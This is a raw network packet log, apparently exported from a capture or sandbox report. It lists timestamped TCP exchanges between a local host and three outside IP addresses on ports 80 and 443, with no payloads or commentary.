                                                                                                                                                                                    Jan 5, 2023 08:58:33.191895962 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.191962957 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.191967964 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192020893 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192032099 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192095995 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192157984 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192158937 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192223072 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192271948 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192289114 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192353010 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192398071 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192461014 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192467928 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192521095 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192532063 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192596912 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192662954 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192715883 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192729950 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192778111 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192790985 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192864895 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192929029 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192933083 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.192994118 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193038940 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193094969 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193108082 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193162918 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193171024 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193233967 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193300962 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193309069 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193365097 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193428040 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193490028 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193490028 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193540096 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193557024 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193633080 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193689108 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.193758011 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.244756937 CET804974462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.245868921 CET4974480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:33.248672009 CET804974662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.250380039 CET4974680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:33.288156033 CET4974680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:33.347678900 CET804974662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.353516102 CET804974662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.353929043 CET4974680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:34.801357031 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:34.801477909 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:34.818569899 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:34.818600893 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:34.887607098 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:34.887643099 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:34.887845993 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:34.949631929 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:34.949757099 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:34.966955900 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:34.966995955 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.036660910 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.041001081 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.041111946 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:35.283143997 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:35.283205032 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.283319950 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:35.285583973 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:35.285614014 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.650755882 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.650971889 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:35.652982950 CET4974680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:35.654346943 CET4974880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:35.681754112 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:35.681792021 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.682255030 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.683068037 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:35.683089018 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.713324070 CET804974662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.713458061 CET4974680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:35.714831114 CET804974862.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.714955091 CET4974880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:35.763040066 CET4974880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:35.824002028 CET804974862.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.830570936 CET804974862.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:35.830677986 CET4974880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:35.993328094 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.033904076 CET4974880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.035048962 CET4974980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.094861031 CET804974862.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.096487045 CET4974880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.096570015 CET804974962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.096668959 CET4974980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.138379097 CET4974980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167418957 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167474031 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167706966 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167762041 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167800903 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167834997 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167846918 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167862892 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167877913 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167881012 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167900085 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167913914 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167913914 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167915106 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167931080 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167948008 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.167967081 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.199120998 CET804974962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.206902981 CET804974962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.207093954 CET4974980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341469049 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341542006 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341592073 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341608047 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341639996 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341660023 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341667891 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341680050 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341737986 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341742039 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341770887 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341799021 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341821909 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341824055 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341846943 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341880083 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.341903925 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.477587938 CET4974980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.478903055 CET4975080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515554905 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515598059 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515729904 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515769958 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515790939 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515814066 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515816927 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515835047 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515866995 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515870094 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515897989 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515907049 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515929937 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.515952110 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.516108990 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.516141891 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.516175985 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.516182899 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.516216040 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.516233921 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.537801027 CET804974962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.537883043 CET4974980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.538058043 CET804975062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.538146973 CET4975080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.599332094 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.599442959 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.599499941 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.599539042 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.599587917 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.599601984 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.660125971 CET4975080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.690680981 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.690771103 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.690834999 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.690864086 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.690882921 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.690910101 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691103935 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691139936 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691176891 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691185951 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691215992 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691232920 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691283941 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691313028 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691351891 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691360950 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691376925 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691399097 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691678047 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691711903 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691766977 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691778898 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691803932 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691819906 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691917896 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691946983 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691981077 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.691988945 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.692019939 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.692038059 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.692138910 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.692167044 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.692199945 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.692209005 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.692230940 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.692245007 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.719427109 CET804975062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.721034050 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.724673033 CET804975062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.724761963 CET4975080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.773348093 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.773415089 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.773494005 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.773555994 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.773595095 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.773622036 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.835170984 CET4975080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.836323977 CET4975180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.864602089 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.864648104 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.864864111 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.864921093 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865000010 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865010023 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865031004 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865066051 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865075111 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865101099 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865108967 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865128994 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865154982 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865164042 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865289927 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865314960 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865344048 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865351915 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865379095 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865763903 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865797043 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865849972 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865861893 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.865878105 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.866238117 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.866265059 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.866309881 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.866322994 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.866355896 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.866647005 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.866678953 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.866729975 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.866743088 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.866763115 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867027998 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867058992 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867101908 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867116928 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867134094 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867367029 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867398024 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867425919 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867435932 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867449045 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867463112 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867671967 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867697001 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867728949 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.867762089 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.889658928 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.889688015 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.889785051 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.891269922 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.894666910 CET804975062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.894781113 CET4975080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.898241043 CET804975162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.898403883 CET4975180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.904386044 CET4975180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:36.908174992 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.908215046 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.908294916 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.908322096 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.908368111 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.948055029 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.948128939 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.948319912 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:36.948375940 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.966434956 CET804975162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.970113993 CET804975162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:36.970261097 CET4975180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.017960072 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.041623116 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.041649103 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.041722059 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.041776896 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.041775942 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.041809082 CET4434974768.65.123.54192.168.2.4
